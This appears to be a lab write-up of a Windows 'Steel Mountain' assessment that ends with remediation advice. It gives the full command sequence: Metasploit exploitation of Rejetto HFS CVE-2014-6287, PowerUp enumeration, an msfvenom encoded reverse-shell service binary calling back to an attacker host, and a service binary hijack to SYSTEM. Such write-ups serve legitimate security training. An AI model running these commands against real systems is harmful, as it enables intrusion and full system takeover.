Rejetto HFS RCE and Windows service binary hijack
Windows Server assessment: Rejetto HFS 2.3 (CVE-2014-6287) via Metasploit as bill; PowerUp identified a restartable LocalSystem service with a writable binary path; msfvenom service EXE replacement yielded SYSTEM.
- Case files
- Rejetto HFS RCE and Windows service binary hijack
IIS and HFS 2.3 on 8080. Metasploit CVE-2014-6287 produced Meterpreter as bill. AdvancedSystemCareService9 was LocalSystem, restartable, and writable by bill — classic service binary plant to SYSTEM.
nmap identified IIS, SMB, RDP, and HFS 2.3 on 8080.
Metasploit module against HFS 8080 returned Meterpreter as bill.
Invoke-AllChecks highlighted AdvancedSystemCareService9. We planted Advanced.exe, restarted the service, and caught SYSTEM on 4443.
Engagement summary
IIS and HFS 2.3 on 8080. Metasploit CVE-2014-6287 produced Meterpreter as bill. AdvancedSystemCareService9 was LocalSystem, restartable, and writable by bill — classic service binary plant to SYSTEM.
STEELMOUNTAIN (10.10.193.112) exposed Microsoft IIS 8.5 and HttpFileServer 2.3. We exploited CVE-2014-6287 with Metasploit for a Meterpreter session as bill. PowerUp flagged AdvancedSystemCareService9: LocalSystem, CanRestart true, binary path writable by STEELMOUNTAIN\bill. Replacing the service EXE with an msfvenom reverse shell and restarting the service elevated to SYSTEM.
Business impact
Unpatched HFS is remote code execution. Writable service binaries under Program Files are a direct privilege escalation path for any local user who can stop/start the service.
Windows service discovery
nmap identified IIS, SMB, RDP, and HFS 2.3 on 8080.
OPERATOR · NMAP
savvy@lab:~$ nmap 10.10.193.112 -sV -sC -Pn
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012
3389/tcp open ssl/ms-wbt-server?
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
NetBIOS name: STEELMOUNTAIN
Initial access — CVE-2014-6287
Metasploit module against HFS 8080 returned Meterpreter as bill.
OPERATOR · MSF
savvy@lab:~$ msfconsole -q
msf6 > search CVE-2014-6287
msf6 > use exploit/windows/http/rejetto_hfs_rce_cve_2014_6287
msf6 exploit(…) > set RHOSTS 10.10.193.112
msf6 exploit(…) > set RPORT 8080
msf6 exploit(…) > set LHOST OPERATOR_IP
msf6 exploit(…) > exploit
meterpreter > getuid
Server username: STEELMOUNTAIN\bill
PowerUp and service binary hijack
Invoke-AllChecks highlighted AdvancedSystemCareService9. We planted Advanced.exe, restarted the service, and caught SYSTEM on 4443.
POWERSHELL
PowerUp.ps1
. .\PowerUp.ps1
Invoke-Allchecks
# ServiceName : AdvancedSystemCareService9
# Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
# StartName : LocalSystem
# CanRestart : True
# ModifiableFileIdentityReference : STEELMOUNTAIN\billOPERATOR · MSFVENOM
savvy@lab:~$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.86.191 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
OPERATOR · SERVICE REPLACE
meterpreter > shell
C:\> sc stop AdvancedSystemCareService9
meterpreter > upload Advanced.exe "\Program Files (x86)\IObit\Advanced SystemCare\Advanced.exe"
savvy@lab:~$ nc -lvnp 4443
C:\> sc start AdvancedSystemCareService9
… reverse shell as SYSTEM …
Remediation
Remove or patch HFS 2.3, restrict write ACLs on service binaries, and run third-party services as least-privilege accounts — not LocalSystem — when possible.